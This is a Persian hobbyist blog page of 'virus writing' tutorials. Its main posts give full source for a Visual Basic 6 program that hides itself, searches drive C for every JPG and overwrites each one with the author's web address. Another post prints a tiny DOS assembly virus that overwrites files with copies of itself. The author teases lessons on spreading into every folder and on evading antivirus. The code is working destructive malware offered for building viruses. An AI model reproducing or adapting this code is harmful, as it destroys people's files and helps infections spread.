تکثیر کرم‏گونه فایل‏ها در یک درایو
دوشنبه 22 شهریور 1389 ساعت 04:05 ب.ظ | نوشته ‌شده به دست Mr.pouria ..... | ( نظرات )
همان‏طور که می‏دانید بسیاری از ویروس‏ها و کرم‏های کامپیوتری، بدین صورت عمل می‏کنند که پس از فعال شدن در سیستم قربانی، یک نسخه از خود را در کلیه فولدرهای کاربر کپی می‏کنند و در نتیجه به سرعت تکثیر می‏شوند. این نوع تکثیر همگانی از شگردهای معمول ویروس‏ها برای انتشار گسترده است. به این صورت که کافی است کاربر یک فولدر را از روی هارددیسک کامپیوتر خود کپی کرده و در یک سیستم دیگر وارد کند، ناخواسته سیستم دیگر نیز آلوده به این ویروس خواهد شد. در این ترفند قصد داریم چنین تکثیری را به شما آموزش دهیم. به این صورت که با یک حرکت ساده، می‏توانید یک فایل را در کلیه فولدرهای یک درایو از کامپیوتر کپی کنید. امیدواریم از این ترفند استفاده‏ای سالم داشته باشید.
بقیه در ادامه مطلب...


ادامه مطلب


xyTune


eMech


ویروس Flicker
پنجشنبه 18 شهریور 1389 ساعت 11:51 ب.ظ | نوشته ‌شده به دست Mr.pouria ..... | ( نظرات )

ویروس Flicker كه بیشتر برای شوخی كردن از آن استفاده میشود. البته flicker بیشتر شباهت به یك برنامه اعصاب خوردكن دارد تا یك ویروس.FLICKER در معنی به معنای چشمك زن و سوسو زدن است و دلیل این نامگذاری این است كه این به اصطلاح ویروس كاری میكند كه كاربر هرگاه دكمه ای از كیبرد را فشار دهد یك صدای بوغ كه به آن اصطلاحا Beep گفته مشود از كامپیوتر شنیده میشود و هم زمان با این صدا صفحه مانیتور یكبار بطور سریع چشمك میزند. و با این وضع عملا كار با كیبرد امكانپذیر نیست. این ویروس از آن دسته است كه به كمك رجیستری كار میكند.
خب حالا میرسیم به شروع كار:

ادامه مطب . . .

 

ادامه مطلب
مرتبط با: ویروس نویسی ,


xyTune


eMech


ویروس جیفو
جمعه 21 اسفند 1388 ساعت 11:38 ق.ظ | نوشته ‌شده به دست Mr.pouria ..... | ( نظرات )

خوب اول کار باید ویروس را تجزیه و تحلیل کینم که ببینیم چکار میکنه بطور خیلی خلاصه .

1 . این ویروس در سیستم فرد قربانی به دنبال فایل مورد نظر میگرده .

2 . در صورت پیدا کردن فایلی اون فایل رو خراب میکنه و کامل از اعتبار دیدن (عکس) ساقطش میکنه .


برای این کار از دستور OPEN استفاده می کنیم . این دستور برای ذخیره و بازیابی داده ها از یک فایل هستش که شکل کلی دستور مثل زیره :

» نکته : هر پارامتری که داخل پرانتز باشه ( ) اجباری هستش ، اگه دا خل { } حداقل یکی باید استفاده بشه و اگر داخل [ ] اختیاری هست می تونید استفاده کنید یا نکنید .

Open FilePath [For Mode] As [#] FileNumber

» FilePath = مسیر فایل مورد نظر برای بازکردن

» ForMode = حالت دسترسی به فایل

» FileNumber = شماره فایل مورد نظر

ForMode میتواند مقادیر زیر را بگیرد :

1. Binary : یک فایل تصادفی را به صورت دودویی باز میکند ( منظور همان بیت ها و بایت ها است ) . در صورت نبود فایل آنرا در مسیر مورد نظر میسازد .

2. Input : فایل ترتیبی را برای خواندن باز میکند .

3. Output : فایل ترتیبی را برای نوشتن باز میکند و در صورت نبود آنرا میسازد .

4. Random : فایل را بای دسترسی تصادفی باز میکند و در صورت نبود آنرا میسازد .

پارامتر FileNumber را هم از طریق دستور FreeFile( ) بدست می آوریم این دستور شماره یک فایل آزاد را بر میگرداند . و دارای رنج خاصی است که مقدار پیش فرض ، بین 1 تا 255 فکر کنم هستش ولی خودتون هم می تونید رنجشو تعیین کنید .

خوب تا اینجا که فهمیدید چطوری باید فایل رو خرابش بکنیم . کدهاشو پاک میکنیم یا یک عددی یا رقمی رو به کدهاش اضافه می کنیم در این صورت فایل دیگه بدرد نمی خوره . و یا اگه حر فه ای باشید ( مثل من ) چاخان گفتم فقط خواستم مزاح کنم . می تونید بجای کدهاش کد خود ویروستون رو جایگزین کنید که با هر بار اجرا کردن ویرستون فعال بشه و اینطوری ویروس تون رو همه جا پخش کنید . اگه خواستید واقعا یک چیز درست حسابی بنویسین حتما کتاب رجیستری من رو که در بخش هک هستش رو بخونید امکانات خوبی رو می تونید به ویروستان اضافه کنید . اگه کار با رجیستری رو هم یاد نداشتید بگین تا آموزشش رو بذارم توی وب . آخه کتابم در مورد رجیستری هستش .

خوب از مسله اصلی زیاد پرت نشیم . دستور زیر این کار رو تمام و کمال انجام میده :

FN = FreeFile

Open
"مسیر فایل" For Binary As #FN
Put #FN, , strFile
Close #FN

دستور Put اطلاعات را درون فایل میریزد و Get اطلاعات را میگیرد یعنی میخواند . دستور Close فایل مورد نظر را می بندد

دستور Put دارای 3 پارامتر است اولی شماره فایل ، دومی شماره رکورد برای ورود اطلاعات یعنی اطلاعات را رکورد شماره چند ذخیره کند و پارامتر 3 که اطلاعاتی هستش که میخواهید در فایل ثبت کنید . (strFile)

خوب دیدین که تا اینجا کدها مون زیاد مالی نبود . اصل کاریشو الان می خوام بگم چیزی که به ویرستون قدرت میده یعنی همون جستجو کردن .

اول از منوی Project گزینه References را انتخاب بکنید تا کادری باز شود و بعد گزینه Microsoft Scripting Runtime را علامت بزنید و سپس OKکنید . بعد در قسمت General برنامه تون این کدها رو وارد کنید .

Dim fso As New FileSystemObject
Dim fld As Folder
Dim FN As Integer
Dim af As String

بعد یک Sub به نام Find تعریف می کنیم اینطوری :

Private Sub Find(ByVal sFol As String, sFile As String)
On Error Resume Next
Dim tFld As Folder, tFil As File, FileName As String
Set fld = fso.GetFolder(sFol)
FileName = Dir(fso.BuildPath(fld.Path, sFile), vbNormal Or _
vbHidden Or vbSystem Or vbReadOnly)
While Len(FileName) <> 0
FindFile = FindFile + FileLen(fso.BuildPath(fld.Path, FileName))
af = fso.BuildPath(fld.Path, FileName) ' Load ListBox
Damage (af)
FileName = Dir() ' Get next file
DoEvents
Wend
If fld.SubFolders.Count > 0 Then
For Each tFld In fld.SubFolders
DoEvents
FindFile = FindFile + FindFile(tFld.Path, sFile)
Next
End If
End Function

این Function دنبال فایل مورد نظر میگرده و مسیر فایل پیدا شده رو در متغییر af که از نوع رشته ای هستش میریزه . بعد متغییر af رو به روال Damage میفرسته که این روال فایل رو خراب میکنه . این هم کد روال Damage :

Private Sub Damage(ByVal FileAddress As String)
FN = FreeFile
Open af For Binary As #FN
Put #FN, , "www.godvb.blogfa.com"
Close #FN
End Sub

این روال Damage اول فایل آدرس سایتمو درج میکنه . دیگه همه چیز تموم شد فقط باید در قسمت Form Load این چند خط کد رو هم بنویسید تا قسمت جستجوش عمل کنه :

Private Sub Form_Load()
Me.Hide
Dim sDir As String
Dim vSrchString As String
Dim lSize As Long
sDir = "C:"
sDir = Left$(sDir, 2) & "\"
vSrchString = LTrim("*.jpg")
lSize = FindFile(sDir, vSrchString)
End Sub

در خط 8 شما می توانید پسوند فایل مورد نظ رتون رو تعریف کنید که الان jpg هستش ، در خط 6 شما باید درایو جستجو شونده رو تعیین کنید توی دستورات فقط درایو C رو میگرده دیگه جستجوی کل هارد رو گذاشتم خودتون بنویسید حداقل یکم که تمرین بکنین تا مختون باز بشه دیگه تنها چیزی که مونده باید مشخصه ShowInTaskbar فرمتون رو باید با False مقدار دهی بکنین

این هم ویروس جیفو . اگه جایی رو موندید حتما بپرسید و مطمئن باشید که حتما هم جواب میدم . اگه با حال باشین یک آموزشی توپ میخوام بذارم تا دیگه واقعا کف کنین آموزش ساخت ویروس طوریکه آنتی ویروس هم نشناستش البته پیش پا افتاده تا منظور از پیش پا افتاده چی باشه


مرتبط با: ویروس نویسی ,


xyTune


eMech


آموزش ویروس نویسی اسمبلی
جمعه 21 اسفند 1388 ساعت 11:35 ق.ظ | نوشته ‌شده به دست Mr.pouria ..... | ( نظرات )
  این کد یکی از کم حجم ترین ویروسهای دنیا هست که بزبان اسمبلی نوشته شده.  ساختار ساده این ویروس همه رو محو میکنه و هنر برنامه نویسی اینجا به اوج میرسه. البته کاری که این ویروس میکنه خیلی احمقانه بنظر میاد.. ولی حجم کمش باعث میشه که مورد توجه قرار بگیره. (دستکاری رجیسترها به این صورت یه کم احمقانه هست  نظر هم بدین

.

;Code by Stormbringer..

.model tiny
.radix 16
.code
        org 100
start:
       
FindFile:       
        xchg    cx,ax           ;ax defaults to zero on runtime - cx doesn't
        push    si              ;si defaults to 100h under dos - use this l8r
        mov     dx,offset filemask
        mov     ah,4e
        int     21

OverwriteFile:
        mov     dx,9e
        mov     ah,3c
        int     21

WriteVirus:       
        xchg    bx,ax
        mov     ah,40
        pop     dx              ;get 100h from si earlier for write pointer
        mov     cl,endvir-start ;move only to CL, CH is already zero
        int     21

Terminate:
        ret                     ;terminate by returning to PSP (Int 20)

filemask        db      '*.*',0
endvir:
end start

 


مرتبط با: ویروس نویسی ,


xyTune


eMech


 
موضوعات
نویسندگان
دیگر موارد
تعداد مطالب :
تعداد نویسندگان :
آخرین بروز رسانی :
بازدید امروز :
بازدید دیروز :
بازدید این ماه :
بازدید ماه قبل :
بازدید کل :
آخرین بازدید :

شبکه اجتماعی فارسی کلوب | Buy Mobile Traffic | سایت سوالات